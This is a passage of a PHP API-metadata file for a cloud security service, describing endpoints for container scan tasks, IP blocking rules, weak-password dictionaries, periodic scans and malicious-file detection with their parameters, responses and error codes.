'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the cluster to which the container belongs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c22143730ab6e40b09ec7c1c51d4d****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ContainerIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the container.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c927cf190e886696db53cda0efb57145394ccf0bf9f525353fa5c22a26e4****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PlainResult', 'description' => 'The request results.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['title' => '', 'description' => 'The ID of the task.'."\n", 'type' => 'string', 'example' => 'fc98d58eb56f699d49bf7ebbd6d7****'], 'TotalCount' => ['title' => '', 'description' => 'The total number of scan tasks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '62'], 'FinishCount' => ['title' => '', 'description' => 'The number of scan tasks that are complete.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '33'], 'CollectTime' => ['title' => '', 'description' => 'The collection time.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150'], 'ExecTime' => ['title' => '', 'description' => 'The execution time of the task.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150'], 'Status' => ['title' => '', 'description' => 'The status of the task.'."\n", 'type' => 'string', 'example' => 'SUCCESS'], 'Progress' => ['title' => '', 'description' => 'The progress of the task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100'], 'Result' => ['title' => '', 'description' => 'The execution result of the task.'."\n", 'type' => 'string', 'example' => 'SUCCESS'], 'CanCreate' => ['title' => '', 'description' => 'Indicates whether you can create more scan tasks.'."\n", 'type' => 'boolean', 'example' => 'true'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '9F4E6157-9600-5588-86B9-38F09067****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"TaskId\\": \\"fc98d58eb56f699d49bf7ebbd6d7****\\",\\n \\"TotalCount\\": 62,\\n \\"FinishCount\\": 33,\\n \\"CollectTime\\": 1644286364150,\\n \\"ExecTime\\": 1644286364150,\\n \\"Status\\": \\"SUCCESS\\",\\n \\"Progress\\": 100,\\n \\"Result\\": \\"SUCCESS\\",\\n \\"CanCreate\\": true\\n },\\n \\"RequestId\\": \\"9F4E6157-9600-5588-86B9-38F09067****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'CreateContainerScanTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateContainerScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateContainerScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateContainerScanTaskByAppName' => [ 'summary' => 'Creates a scan task for a running container application based on the application name.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '166115', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], ], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The cluster ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cfb7a55a81f7246b5ac18845ea79a****'], ], [ 'name' => 'AppNames', 'in' => 'query', 'schema' => ['description' => 'The name of the container application.'."\n", 'type' => 'string', 'required' => false, 'example' => 'app-centos-01', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response.'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned if the request was successful.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['title' => '', 'description' => 'The ID of the scan task.'."\n", 'type' => 'string', 'example' => 'fc98d58eb56f699d49bf7ebbd6d7****'], 'TotalCount' => ['title' => '', 'description' => 'The total number of container applications that you want to scan.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'FinishCount' => ['title' => '', 'description' => 'The number of container applications that are scanned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'CollectTime' => ['title' => '', 'description' => 'The timestamp generated when the image information was collected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150'], 'ExecTime' => ['title' => '', 'description' => 'The timestamp generated when the scan task started. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150'], 'Status' => ['title' => '', 'description' => 'The status of the scan task. Valid values:'."\n" ."\n" .'* **INIT**: The task is being initialized.'."\n" .'* **PRE_ANALYZER**: The task is being pre-processed.'."\n" .'* **SUCCESS**: The task succeeds.'."\n" .'* **FAIL**: The task fails.'."\n", 'type' => 'string', 'example' => 'SUCCESS'], 'Progress' => ['title' => '', 'description' => 'The progress of the scan task in percentage.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100'], 'Result' => ['title' => '', 'description' => 'The result of the scan task. Valid values:'."\n" ."\n" .'* **SUCCESS**: The task is successful.'."\n" .'* **TASK_NOT_SUPPORT_REGION**: The task is not supported in the region where the image is deployed.'."\n" ."\n" .'> '."\n", 'type' => 'string', 'example' => 'SUCCESS'], 'CanCreate' => ['title' => '', 'description' => 'Indicates whether you can create more scan tasks. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => 'Parameter error, please check the input parameters.'], ['errorCode' => 'TaskIsProcessing', 'errorMessage' => 'Task Is Processing.', 'description' => 'Task is processing.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"TaskId\\": \\"fc98d58eb56f699d49bf7ebbd6d7****\\",\\n \\"TotalCount\\": 5,\\n \\"FinishCount\\": 5,\\n \\"CollectTime\\": 1644286364150,\\n \\"ExecTime\\": 1644286364150,\\n \\"Status\\": \\"SUCCESS\\",\\n \\"Progress\\": 100,\\n \\"Result\\": \\"SUCCESS\\",\\n \\"CanCreate\\": true\\n },\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'CreateContainerScanTaskByAppName', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateContainerScanTaskByAppName'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateContainerScanTaskByAppName', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateCustomBlockRecord' => [ 'summary' => 'Creates an IP address blocking policy for one or more servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91922', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => true, 'example' => '71c846d6-5c84-4714-acfc-58265bc3****,5013b5e8-1613-43a8-b4de-651db318****,df53f0ad-b3ba-4fe0-9ec7-f42a2ae2****', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that you want to specify in the policy.'."\n", 'type' => 'string', 'required' => true, 'example' => '192.168.xx.xx', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction that you want to specify in the policy. Valid values:'."\n" ."\n" .'* **in**: inbound'."\n" .'* **out**: outbound'."\n", 'type' => 'string', 'required' => true, 'example' => 'in', 'title' => ''], ], [ 'name' => 'ExpireTime', 'in' => 'query', 'schema' => ['description' => 'The expiration time of the policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1859094550000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RuleRecordIsExists', 'errorMessage' => 'Rule record already exists.', 'description' => 'The rule already exists.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateCustomBlockRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCustomBlockRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateCustomBlockRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\"\\n}","type":"json"}]', ], 'CreateCustomizedDict' => [ 'summary' => 'Creates custom weak password rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91923', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '106.11.43.***', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Override', 'in' => 'query', 'schema' => ['description' => 'Whether to overwrite. Value range: - true: Overwrite. - false: Do not overwrite.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '08571630-26D8-5E07-A4B7-DF8E89CF****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'CreateCustomizedDict', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCustomizedDict'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateCustomizedDict', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"08571630-26D8-5E07-A4B7-DF8E89CF****\\"\\n}","type":"json"}]', 'translator' => 'machine', ], 'CreateCycleTask' => [ 'summary' => 'Creates a periodic scan task. The task can be an image scan task, urgent vulnerability scan task, or virus scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'TaskName', 'in' => 'query', 'schema' => [ 'description' => 'The name of the task. Valid values:'."\n" ."\n" .'* **VIRUS_VUL_SCHEDULE_SCAN**: virus scan task'."\n" .'* **IMAGE_SCAN**: image scan task'."\n" .'* **EMG_VUL_SCHEDULE_SCAN**: urgent vulnerability scan task'."\n", 'type' => 'string', 'required' => true, 'enumValueTitles' => [], 'example' => 'EMG_VUL_SCHEDULE_SCAN', 'title' => '', ], ], [ 'name' => 'TaskType', 'in' => 'query', 'schema' => [ 'description' => 'The type of the task. Valid values:'."\n" ."\n" .'* **VIRUS_VUL_SCHEDULE_SCAN**: virus scan task'."\n" .'* **IMAGE_SCAN**: image scan task'."\n" .'* **EMG_VUL_SCHEDULE_SCAN**: urgent vulnerability scan task'."\n", 'type' => 'string', 'required' => true, 'enumValueTitles' => [], 'example' => 'VIRUS_VUL_SCHEDULE_SCAN', 'title' => '', ], ], [ 'name' => 'PeriodUnit', 'in' => 'query', 'schema' => ['description' => 'The unit of the scan interval. Valid values:'."\n" ."\n" .'* **day**: days'."\n" .'* **hour**: hours'."\n", 'type' => 'string', 'required' => true, 'example' => 'day', 'title' => ''], ], [ 'name' => 'IntervalPeriod', 'in' => 'query', 'schema' => ['description' => 'The interval of the task.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '7', 'title' => ''], ], [ 'name' => 'FirstDateStr', 'in' => 'query', 'schema' => ['description' => 'The first time when the task is performed.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1650556800000', 'title' => ''], ], [ 'name' => 'TargetStartTime', 'in' => 'query', 'schema' => ['description' => 'The time when the task is started. Unit: hours.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'TargetEndTime', 'in' => 'query', 'schema' => ['description' => 'The time when the task ends. Unit: hours.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '6', 'title' => ''], ], [ 'name' => 'Param', 'in' => 'query', 'schema' => ['description' => 'The additional information.'."\n", 'type' => 'string', 'required' => false, 'example' => '{'."\n" .' "targetInfo": ['."\n" .' {'."\n" .' "type": "groupId",'."\n" .' "name": "TI HOST",'."\n" .' "target": 10597***'."\n" .' },'."\n" .' {'."\n" .' "type": "groupId",'."\n" .' "name": "expense HOST",'."\n" .' "target": 10597***'."\n" .' }'."\n" .' ]'."\n" .'}', 'title' => ''], ], [ 'name' => 'Enable', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the task. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The additional source for the task.'."\n", 'type' => 'string', 'required' => false, 'example' => 'console_batch', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '86CFF42E-E00A-57A3-8656-22291EFB****', 'title' => ''], 'ConfigId' => ['description' => 'The ID of the task configuration.', 'type' => 'string', 'example' => '00cfa8161da093089e6804ba6a33****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"86CFF42E-E00A-57A3-8656-22291EFB****\\",\\n \\"ConfigId\\": \\"00cfa8161da093089e6804ba6a33****\\"\\n}","type":"json"}]', 'title' => 'CreateCycleTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCycleTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateCycleTask', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CycleTask', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:cycletask/*'], ], ], ], ], ], 'CreateDynamicDict' => [ 'summary' => 'Creates a dynamic dictionary of weak passwords.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91925', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '123.103.9.***', 'title' => ''], ], [ 'name' => 'Override', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to overwrite existing data. Valid values:'."\n" ."\n" .'* true'."\n" .'* false'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'default' => 'false', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'EACE89CB-F32B-5A85-9242-D474A2ED****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::CreateCustomizedDict'], ], 'title' => 'CreateDynamicDict', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateDynamicDict'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateDynamicDict', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"EACE89CB-F32B-5A85-9242-D474A2ED****\\"\\n}","type":"json"}]', ], 'CreateFileDetect' => [ 'summary' => 'Submits a file to the cloud for detection.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '140701', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the source.', 'type' => 'string', 'required' => false, 'example' => '115.213.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the file to detect. Valid values:'."\n" ."\n" .'- **0**: Malicious file detection'."\n" ."\n" .'- **6**: Skill archive detection', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'HashKey', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the file.'."\n" ."\n" .'This parameter is required if `Type` is `0`. Its value must be the MD5 or SHA-256 hash of the file.'."\n" ."\n" .'If you set `Type` to `6`, you do not need to specify this parameter. The operation returns the file\'s unique identifier in the response.', 'type' => 'string', 'required' => false, 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], ], [ 'name' => 'OssKey', 'in' => 'query', 'schema' => ['description' => 'The storage key of the file in an Object Storage Service (OSS) bucket.'."\n" ."\n" .'If you submit the file by using the `DownloadUrl` parameter, you can leave this parameter empty. To obtain the value of this parameter, call the [CreateFileDetectUploadUrl](~~CreateFileDetectUploadUrl~~) operation.'."\n" ."\n" .'> This parameter is not supported when `Type` is set to `6`.', 'type' => 'string', 'required' => false, 'example' => '1/2022/06/23/15/41/16559701077444693a0c6-33b2-4cc2-a99f-9f38b8b8****', 'title' => ''], ], [ 'name' => 'DownloadUrl', 'in' => 'query', 'schema' => ['description' => 'The download link for the file. You can provide a public URL to trigger file detection without uploading the file.'."\n" ."\n" .'> Skill archives can be submitted only by providing a download link. Therefore, this parameter is required when `Type` is set to `6`.', 'type' => 'string', 'required' => false, 'example' => 'https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx', 'title' => ''], ], [ 'name' => 'Decompress', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to decompress the archive for detection. Valid values:'."\n" ."\n" .'- **true**: Yes.'."\n" ."\n" .'- **false**: No.'."\n" ."\n" .'> This parameter is not supported when `Type` is set to `6`.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'DecompressMaxLayer', 'in' => 'query', 'schema' => ['description' => 'The maximum number of decompression layers for nested archives. The maximum value is 5.'."\n" ."\n" .'This parameter is required if you set `Decompress` to `true`.'."\n" ."\n" .'> This parameter is not supported when `Type` is set to `6`.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DecompressMaxFileCount', 'in' => 'query', 'schema' => ['description' => 'The maximum number of files that can be decompressed from an archive. The maximum value is 1000.'."\n" ."\n" .'This parameter is required if you set `Decompress` to `true`.'."\n" ."\n" .'> This parameter is not supported when `Type` is set to `6`.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '100', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'title' => '', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F'], 'HashKey' => ['description' => 'The unique identifier of the file.', 'type' => 'string', 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RequestTooFrequently', 'errorMessage' => 'Request too frequently, please try again later', 'description' => ''], ['errorCode' => 'GetFileError', 'errorMessage' => 'Get file error, please check input params and file size, and make sure upload file success.', 'description' => ''], ['errorCode' => 'InvalidDownloadUrl', 'errorMessage' => 'Invalid file download URL.', 'description' => ''], ['errorCode' => 'FileSizeOverLimit', 'errorMessage' => 'File size over limit.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'SystemBusy', 'errorMessage' => 'System busy, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"HashKey\\": \\"0a212417e65c26ff133cfff28f6c****\\"\\n}","type":"json"}]', 'title' => 'CreateFileDetect', 'description' => 'Use this operation to submit a file to the cloud for detection. It supports two scenarios: malicious file detection and Skill archive detection.'."\n" ."\n" .'### File submission methods'."\n" ."\n" .'Submit a file by either pre-uploading it or providing a download link.'."\n" ."\n" .'If you use the pre-upload method, ensure the file is uploaded successfully before you call this operation. For details on how to upload a file, see the CreateFileDetectUploadUrl operation.'."\n" ."\n" .'If you use a download link, specify a publicly accessible URL in the `DownloadUrl` parameter.'."\n" ."\n" .'The malicious file detection scenario supports both methods. For the Skill archive detection scenario (when `Type` is `6`), the pre-upload method is not supported, and you must provide a download link.'."\n" ."\n" .'### Unique identifier'."\n" ."\n" .'All API operations related to file detection include the `HashKey` parameter. This parameter specifies the file\'s unique identifier for a detection task, which you use to query the results.'."\n" ."\n" .'For Skill archive detection (when `Type` is `6`), you do not need to calculate the `HashKey` in advance. This operation returns a globally unique UUID as the file\'s identifier, which you can use to query the results.'."\n" ."\n" .'For malicious file detection (when `Type` is `0`), you must calculate the `HashKey` before you call this operation. The `HashKey` value must be the MD5 or SHA-256 hash of the entire file.'."\n" ."\n" .'To calculate the MD5 or SHA-256 hash of a file, follow these steps:'."\n" ."\n" .'1. Use the MD5 or SHA-256 algorithm to generate a 128-bit or 256-bit hash value. You can use common libraries such as `MessageDigest` in Java or the `hashlib` library in Python.'."\n" ."\n" .'2. Encode the hash value into a hexadecimal string. You can use tools such as the `Codec` utility in Java or the `hex()` function in Python. Ensure that the final string consists of only digits and lowercase letters. An MD5 hash is 32 characters long, and a SHA-256 hash is 64 characters long.'."\n" ."\n" .'Note: You must use the same `HashKey` value when you submit a file for detection and when you query the results. Otherwise, both the submission and the query will fail.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '1000', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileDetect'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateFileDetect', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateFileDetectUploadUrl' => [ 'summary' => 'Queries the parameters that are required to upload a file for detection.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '140698', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'HashKeyList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The identifiers of files. Only MD5 hash values are supported.'."\n" ."\n" .'> You must specify at least one of the **HashKeyList** and **HashKeyContextList** parameters.'."\n", 'type' => 'array', 'items' => ['description' => 'The identifier of the file. Only MD5 hash values are supported.'."\n", 'type' => 'string', 'required' => false, 'example' => 